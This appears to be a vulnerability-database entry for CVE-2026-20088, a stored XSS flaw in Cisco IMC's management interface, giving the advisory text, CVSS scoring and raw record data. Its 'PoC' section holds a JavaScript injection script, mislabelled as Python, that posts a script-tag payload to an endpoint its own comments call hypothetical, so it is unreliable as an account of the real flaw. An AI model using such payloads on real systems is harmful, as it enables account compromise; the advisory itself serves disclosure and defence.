Security Vulnerability Report
中文
CVE-2026-20088 CVSS 4.8 MEDIUM

CVE-2026-20088

Published: 2026-04-01 17:28:27
Last Modified: 2026-04-03 16:11:11
Source: [email protected]

Description

A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco IMC (具体受影响版本请参考Cisco官方公告cisco-sa-cimc-xss-A2tkgVAB)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-20088 (Cisco IMC Stored XSS) * Description: Injecting a script into a vulnerable input parameter. * Precondition: Attacker needs Admin privileges to inject the payload. */ // The malicious payload intended for injection var xssPayload = '<script>alert("CVE-2026-20088 - XSS Executed");</script>'; // Function to simulate the injection request function exploit(targetUrl, sessionId) { // Construct the data payload for a vulnerable form field // This assumes a hypothetical endpoint 'save_config' var params = new URLSearchParams(); params.append('description', xssPayload); // Vulnerable field params.append('save', 'Save'); fetch(targetUrl + '/cgi-bin/config/save', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'JSESSIONID=' + sessionId // Authenticated session cookie }, body: params }) .then(response => { if (response.ok) { console.log('[+] Payload injected successfully. Trigger XSS by visiting the management page.'); } else { console.log('[-] Injection failed.'); } }) .catch(error => console.error('Error:', error)); } // Usage // exploit('https://<target-ip>', 'admin_session_id');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20088", "sourceIdentifier": "[email protected]", "published": "2026-04-01T17:28:27.457", "lastModified": "2026-04-03T16:11:11.357", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface.\r\n\r\nThis vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-xss-A2tkgVAB", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.